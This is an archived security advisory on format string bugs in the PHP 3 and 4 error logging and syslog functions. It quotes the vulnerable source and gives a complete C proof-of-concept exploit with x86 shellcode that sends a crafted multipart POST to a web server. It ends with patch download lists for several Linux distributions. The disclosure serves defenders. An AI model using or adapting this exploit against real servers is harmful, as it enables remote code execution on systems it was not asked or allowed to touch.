COMMAND
PHP
SYSTEMS AFFECTED
PHP3 and PHP4
PROBLEM
Following is based on a findings by Jouko Pynnen and Dildog
(@stake). According to Jouko PHP is a commonly used HTML-embedded
scripting language. Format string vulnerabilities exist in the
error logging routines of PHP versions 3 and 4, allowing remote
users to execute arbitrary code under the web server's user id.
A web server having PHP installed and one or more PHP scripts is
vulnerable to the problem if error logging is enabled in php.ini.
Also any PHP script using the "syslog" command of PHP may be
vulnerable, regardless of error logging.
The problem was tested on a Red Hat Linux system having Apache and
mod_php3 installed. Error logging was enabled in php.ini. With a
test exploit program, a shellcode could be run remotely under the
web server user id, which is typically not the root user.
In main.c, function php3_log_error():
#if HAVE_SYSLOG_H
if (!strcmp(php3_ini.error_log, "syslog")) {
syslog(LOG_NOTICE, log_message);
return;
} else {
#endif
log_file = fopen(php3_ini.error_log, "a");
if (log_file != NULL) {
fprintf(log_file, log_message);
...
This one is a classical "format bug". There are a couple of other
similar fprintf() calls in the same function, as well as Apache
API function calls to aplog_error() and log_error() which all use
the log_message as a format string.
The message can be trivially generated with any php3 script on a
web server, for example by sending a POST request with
content-type "multipart/form-data" but without a boundary string.
A shellcode and other data may be placed in the error message.
The error message can be generated without the script actually
wanting to process any POST data.
Another format bug in functions/syslog.c, function php3_syslog:
syslog(priority->value.lval, message->value.str.val);
The "syslog" command of PHP takes two parameters, the
priority/facility number and the message itself. The message is
always passed to libc syslog() as a format string. Thus any
program doing syslogging may be vulnerable to a format string
attack; details depend on the script in question. The code
fragments above are taken from PHP 3 sources, but the
vulnerabilities exist in PHP version 4 too.
Here's what @stake had to say. PHP versions 3 and 4 employ a set
of logging functions that, through an improper use of 'syslog()'
and 'vsnprintf()', render it vulnerable to attack. The attacker
could utilize this vulnerability to remotely compromise any PHP
enabled webserver that has logging to either syslog or to a file
enabled in the 'php.ini' configuration file. This particular
attack does not affect PHP installations that do not log PHP
errors and warnings.
PHP versions 3 and 4 utilize the following functions:
main/php_syslog.h:
#define php_syslog syslog
main/main.c:
void php_log_err(char *log_message)
{
...
php_syslog(LOG_NOTICE, log_message)
...
fprintf(log_file, "[%s] ", error_time_str);
fprintf(log_file, log_message);
fprintf(log_file, "\n");
...
}
Hence, if the "log_message" contains any user input at all, then
it creates a vulnerability. An exploitable condition is
presented in the following code for PHP 3, since 'php3_error'
calls down to php_log_err if logging is enabled:
main/main.c:
PHPAPI void php3_error(int type, const char *format,...) {
...
char log_buffer[1024];
snprintf(log_buffer, 1024, "PHP 3 %s: %s in %s on line %d",
error_type_str, buffer, filename, php3_get_lineno(GLOBAL(current_lineno)));
php3_log_err(log_buffer);
...
}
functions/post.c:
static char *php3_getpost(pval *http_post_vars)
{
...
php3_error(E_WARNING, "File Upload Error: No MIME boundary
found");
php3_error(E_WARNING, "There should have been a
\"boundary=3Dsomething\" in the Content-Type string");
php3_error(E_WARNING, "The Content-Type string was: \"%s\"",
ctype);
...
}
PHP4 looks vulnerable as well, but in a different place. When a
file is uploaded via a post operation, if the file name contains
format string exploit code, and the file size is larger than the
maximum file size for uploads, the following code is executed.
Note that this possible problem has not been tested by @stake,
but the code path looks problematic:
static void php_mime_split(char *buf, int cnt, char *boundary, zval
*array_ptr)
{
...
php_error(E_WARNING, "Max file size exceeded - file [%s] not
saved", namebuf);
...
}
Following proof of concept code creates a zero length file in
/tmp/BADPHP. Use like this:
gcc badphp.c && ./a.out <ip address of webserver> <port of webserver> <php file path>
(php file path must point to an existing php file, such as
/foo.php3)
#include<stdio.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<arpa/inet.h>
#include<netdb.h>
#define BSIZE 1549
#define BUFFERZONE 128
int main(int argc, char *argv[])
{
int i,start,count;
int stackloc=0xBFFFDA60;
int s;
FILE *f;
fd_set rfds;
struct hostent *he;
struct sockaddr_in saddr;
char sploit[BSIZE];
char file[]="/tmp/BADPHP";
char c;
if(argc!=5) {
printf("%s <addr> <port> <offset> <php file name>\n",argv[0]);
printf("offset=0 for most systems.\n");
return 0;
}
/*** build exploit string ***/
/* write bad format string, adding in offset */
snprintf(sploit,sizeof(sploit),
"Content-Type:multipart/form-data %%%uX%%X%%X%%hn",
55817 /*+offset0,1,2,3*/ );
/* fill with breakpoints and nops*/
start=strlen(sploit);
memset(sploit+start,0xCC,BSIZE-start);
memset(sploit+start+BUFFERZONE*4,0x90,BUFFERZONE*4);
sploit[BSIZE-1]=0;
/* pointer to start of code (stackloc+4) */
count=BUFFERZONE;
for(i=0;i<count;i++) {
unsigned int value=stackloc+4+(count*4);
if((value&0x000000FF)==0) value|=0x00000004;
if((value&0x0000FF00)==0) value|=0x00000400;
if((value&0x00FF0000)==0) value|=0x00040000;
if((value&0xFF000000)==0) value|=0x04000000;
*(unsigned int *)&(sploit[start+i*4])=value;
}
start+=BUFFERZONE*4*2;
/*** build shellcode ***/
sploit[start+0]=0x90; /* nop */
sploit[start+1]=0xBA; /* mov edx, (not 0x1B6 (a+rw)) */
sploit[start+2]=0x49;
sploit[start+3]=0xFE;
sploit[start+4]=0xFF;
sploit[start+5]=0xFF;
sploit[start+6]=0xF7; /* not edx */
sploit[start+7]=0xD2;
sploit[start+8]=0xB9; /* mov ecx, (not 0x40 (O_CREAT)) */
sploit[start+9]=0xBF;
sploit[start+10]=0xFF;
sploit[start+11]=0xFF;
sploit[start+12]=0xFF;
sploit[start+13]=0xF7; /* not ecx */
sploit[start+14]=0xD1;
sploit[start+15]=0xE8; /* call eip+4 + inc eax (overlapping) */
sploit[start+16]=0xFF;
sploit[start+17]=0xFF;
sploit[start+18]=0xFF;
sploit[start+19]=0xFF;
sploit[start+20]=0xC0;
sploit[start+21]=0x5B; /* pop ebx */
sploit[start+22]=0x6A; /* push 22 (offset to end of sploit (filename)) */
sploit[start+23]=0x16;
sploit[start+24]=0x58; /* pop eax */
sploit[start+25]=0x03; /* add ebx,eax */
sploit[start+26]=0xD8;
sploit[start+27]=0x33; /* xor eax,eax */
sploit[start+28]=0xC0;
sploit[start+29]=0x88; /* mov byte ptr [ebx+11],al */
sploit[start+30]=0x43;
sploit[start+31]=0x0B;
sploit[start+32]=0x83; /* add eax,5 */
sploit[start+33]=0xC0;
sploit[start+34]=0x05;
sploit[start+35]=0xCD; /* int 80 (open) */
sploit[start+36]=0x80;
sploit[start+37]=0x33; /* xor eax,eax */
sploit[start+38]=0xC0;
sploit[start+39]=0x40; /* inc eax */
sploit[start+40]=0xCD; /* int 80 (_exit) */
sploit[start+41]=0x80;
/* add filename to touch */
strncpy(&sploit[start+42],file,strlen(file));
/*** send exploit string ***/
/* create socket */
s=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP);
if(s<0) {
printf("couldn't create socket.\n");
return 0;
}
/* connect to port */
memset(&saddr,0,sizeof(saddr));
saddr.sin_family=AF_INET;
saddr.sin_port=htons(atoi(argv[2]));
he=gethostbyname(argv[1]);
if(he==NULL) {
printf("invalid hostname.\n");
}
memcpy(&(saddr.sin_addr.s_addr),he->h_addr_list[0],sizeof(struct in_addr));
if(connect(s,(struct sockaddr *)&saddr,sizeof(saddr))!=0) {
printf("couldn't connect.\n");
return 0;
}
/* fdopen the socket to use stream functions */
f=fdopen(s,"w");
if(f==NULL) {
close(s);
printf("couldn't fdopen socket.\n");
return 0;
}
/* put the post request to the socket */
fprintf(f,"POST %s HTTP/1.0\n",argv[4]);
fputs(sploit,f);
fputc('\n',f);
fputc('\n',f);
fflush(f);
/* close the socket */
fclose(f);
close(s);
return 0;
}
SOLUTION
A temporary workaround is to disable error logging in php.ini,
and disable any PHP scripts that use the syslog command. A new
fixed version of PHP 4 is downloadable at
http://www.php.net/do_download.php?download_file=php-4.0.3.tar.gz
A fixed version of PHP3 is available:
http://www.php.net/distributions/php-3.0.17.tar.gz
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/mod_php3-3.0.17-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/imap-4.7c2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/libxmltok-1.0-3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/mod_php3-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/mod_php3-doc-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/mod_php3-gd-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/mod_php3-imap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/mod_php3-ldap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/mod_php3-mysql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/mod_php3-pgsql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/mod_php3-xml-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/php3-cgi-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/php3-cgi-gd-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/php3-cgi-imap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/php3-cgi-ldap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/php3-cgi-mysql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/php3-cgi-pgsql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/php3-cgi-xml-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/imap-4.7c2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/imap-devel-4.7c2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/libxmltok-1.0-3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/libxmltok-devel-1.0-3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/mod_php3-3.0.17-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/imap-4.7c2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/libxmltok-1.0-3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/mod_php3-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/mod_php3-doc-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/mod_php3-gd-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/mod_php3-imap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/mod_php3-ldap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/mod_php3-mysql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/mod_php3-pgsql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/mod_php3-xml-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/php3-cgi-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/php3-cgi-gd-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/php3-cgi-imap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/php3-cgi-ldap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/php3-cgi-mysql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/php3-cgi-pgsql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/php3-cgi-xml-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/imap-4.7c2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/imap-devel-4.7c2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/libxmltok-1.0-3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/libxmltok-devel-1.0-3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/mod_php3-3.0.17-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-doc-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-gd-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-imap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-ldap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-mysql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-pgsql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-xml-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/php3-cgi-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/php3-cgi-gd-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/php3-cgi-imap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/php3-cgi-ldap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/php3-cgi-mysql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/php3-cgi-pgsql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/php3-cgi-xml-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/mod_php3-3.0.17-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-doc-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-gd-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-imap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-ldap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-mysql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-pgsql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-xml-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/php3-cgi-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/php3-cgi-gd-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/php3-cgi-imap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/php3-cgi-ldap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/php3-cgi-mysql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/php3-cgi-pgsql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/php3-cgi-xml-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/mod_php3-3.0.17-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-doc-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-gd-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-imap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-ldap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-mysql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-pgsql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-xml-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/php3-cgi-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/php3-cgi-gd-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/php3-cgi-imap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/php3-cgi-ldap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/php3-cgi-mysql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/php3-cgi-pgsql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/php3-cgi-xml-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/mod_php3-3.0.17-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-doc-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-gd-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-imap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-ldap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-mysql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-pgsql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-xml-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/php3-cgi-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/php3-cgi-gd-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/php3-cgi-imap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/php3-cgi-ldap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/php3-cgi-mysql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/php3-cgi-pgsql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/php3-cgi-xml-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/mod_php3-3.0.17-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mod_php3-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mod_php3-doc-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mod_php3-gd-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mod_php3-imap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mod_php3-ldap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mod_php3-mysql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mod_php3-pgsql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mod_php3-xml-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/php3-cgi-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/php3-cgi-gd-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/php3-cgi-imap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/php3-cgi-ldap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/php3-cgi-mysql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/php3-cgi-pgsql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/php3-cgi-xml-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/mod_php3-3.0.17-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mod_php3-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mod_php3-doc-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mod_php3-gd-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mod_php3-imap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mod_php3-ldap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mod_php3-mysql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mod_php3-pgsql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mod_php3-xml-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/php3-cgi-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/php3-cgi-gd-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/php3-cgi-imap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/php3-cgi-ldap-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/php3-cgi-mysql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/php3-cgi-pgsql-3.0.17-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/php3-cgi-xml-3.0.17-1cl.i386.rpm
For Linux-Mandrake:
Linux-Mandrake 6.1: 6.1/RPMS/mod_php3-3.0.17-1mdk.i586.rpm
6.1/RPMS/mod_php3-imap-3.0.17-1mdk.i586.rpm
6.1/RPMS/mod_php3-manual-3.0.17-1mdk.i586.rpm
6.1/RPMS/mod_php3-pgsql-3.0.17-1mdk.i586.rpm
6.1/SRPMS/mod_php3-3.0.17-1mdk.src.rpm
Linux-Mandrake 7.0: 7.0/RPMS/mod_php3-3.0.17-1mdk.i586.rpm
7.0/RPMS/mod_php3-imap-3.0.17-1mdk.i586.rpm
7.0/RPMS/mod_php3-manual-3.0.17-1mdk.i586.rpm
7.0/RPMS/mod_php3-pgsql-3.0.17-1mdk.i586.rpm
7.0/SRPMS/mod_php3-3.0.17-1mdk.src.rpm
Linux-Mandrake 7.1: 7.1/RPMS/mod_php3-3.0.17-2mdk.i586.rpm
7.1/RPMS/mod_php3-imap-3.0.17-2mdk.i586.rpm
7.1/RPMS/mod_php3-ldap-3.0.17-2mdk.i586.rpm
7.1/RPMS/mod_php3-manual-3.0.17-2mdk.i586.rpm
7.1/RPMS/mod_php3-mysql-3.0.17-2mdk.i586.rpm
7.1/RPMS/mod_php3-pgsql-3.0.17-2mdk.i586.rpm
7.1/SRPMS/mod_php3-3.0.17-2mdk.src.rpm
Slink Debian contains php3 version 3.0.5, which is believed to be
affected by this problem. No security updates for slink are
available at this time; Slink users who have php3 installed are
highly recommended to either upgrade to potato or recompile the
potato php3 packages from source (see the URLs below).
For Debian GNU/Linux 2.2 (stable) alias potato:
http://security.debian.org/dists/potato/updates/main/source/php4_4.0.3-0potato1.diff.gz
http://security.debian.org/dists/potato/updates/main/source/php4_4.0.3-0potato1.dsc
http://security.debian.org/dists/potato/updates/main/source/php4_4.0.3.orig.tar.gz
http://security.debian.org/dists/potato/updates/main/binary-all/php4-dev_4.0.3-0potato1_all.deb
http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-cgi-gd_4.0.3-0potato1_alpha.deb
http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-cgi-imap_4.0.3-0potato1_alpha.deb
http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-cgi-ldap_4.0.3-0potato1_alpha.deb
http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-cgi-mhash_4.0.3-0potato1_alpha.deb
http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-cgi-mysql_4.0.3-0potato1_alpha.deb
http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-cgi-pgsql_4.0.3-0potato1_alpha.deb
http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-cgi-snmp_4.0.3-0potato1_alpha.deb
http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-cgi-xml_4.0.3-0potato1_alpha.deb
http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-cgi_4.0.3-0potato1_alpha.deb
http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-gd_4.0.3-0potato1_alpha.deb
http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-imap_4.0.3-0potato1_alpha.deb
http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-ldap_4.0.3-0potato1_alpha.deb
http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-mhash_4.0.3-0potato1_alpha.deb
http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-mysql_4.0.3-0potato1_alpha.deb
http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-pgsql_4.0.3-0potato1_alpha.deb
http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-snmp_4.0.3-0potato1_alpha.deb
http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-xml_4.0.3-0potato1_alpha.deb
http://security.debian.org/dists/potato/updates/main/binary-alpha/php4_4.0.3-0potato1_alpha.deb
http://security.debian.org/dists/potato/updates/main/binary-i386/php4-cgi-gd_4.0.3-0potato1_i386.deb
http://security.debian.org/dists/potato/updates/main/binary-i386/php4-cgi-imap_4.0.3-0potato1_i386.deb
http://security.debian.org/dists/potato/updates/main/binary-i386/php4-cgi-ldap_4.0.3-0potato1_i386.deb
http://security.debian.org/dists/potato/updates/main/binary-i386/php4-cgi-mhash_4.0.3-0potato1_i386.deb
http://security.debian.org/dists/potato/updates/main/binary-i386/php4-cgi-mysql_4.0.3-0potato1_i386.deb
http://security.debian.org/dists/potato/updates/main/binary-i386/php4-cgi-pgsql_4.0.3-0potato1_i386.deb
http://security.debian.org/dists/potato/updates/main/binary-i386/php4-cgi-snmp_4.0.3-0potato1_i386.deb
http://security.debian.org/dists/potato/updates/main/binary-i386/php4-cgi-xml_4.0.3-0potato1_i386.deb
http://security.debian.org/dists/potato/updates/main/binary-i386/php4-cgi_4.0.3-0potato1_i386.deb
http://security.debian.org/dists/potato/updates/main/binary-i386/php4-gd_4.0.3-0potato1_i386.deb
http://security.debian.org/dists/potato/updates/main/binary-i386/php4-imap_4.0.3-0potato1_i386.deb
http://security.debian.org/dists/potato/updates/main/binary-i386/php4-ldap_4.0.3-0potato1_i386.deb
http://security.debian.org/dists/potato/updates/main/binary-i386/php4-mhash_4.0.3-0potato1_i386.deb
http://security.debian.org/dists/potato/updates/main/binary-i386/php4-mysql_4.0.3-0potato1_i386.deb
http://security.debian.org/dists/potato/updates/main/binary-i386/php4-pgsql_4.0.3-0potato1_i386.deb
http://security.debian.org/dists/potato/updates/main/binary-i386/php4-snmp_4.0.3-0potato1_i386.deb
http://security.debian.org/dists/potato/updates/main/binary-i386/php4-xml_4.0.3-0potato1_i386.deb
http://security.debian.org/dists/potato/updates/main/binary-i386/php4_4.0.3-0potato1_i386.deb
http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-cgi-gd_4.0.3-0potato1_m68k.deb
http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-cgi-imap_4.0.3-0potato1_m68k.deb
http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-cgi-ldap_4.0.3-0potato1_m68k.deb
http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-cgi-mhash_4.0.3-0potato1_m68k.deb
http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-cgi-mysql_4.0.3-0potato1_m68k.deb
http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-cgi-pgsql_4.0.3-0potato1_m68k.deb
http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-cgi-snmp_4.0.3-0potato1_m68k.deb
http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-cgi-xml_4.0.3-0potato1_m68k.deb
http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-cgi_4.0.3-0potato1_m68k.deb
http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-gd_4.0.3-0potato1_m68k.deb
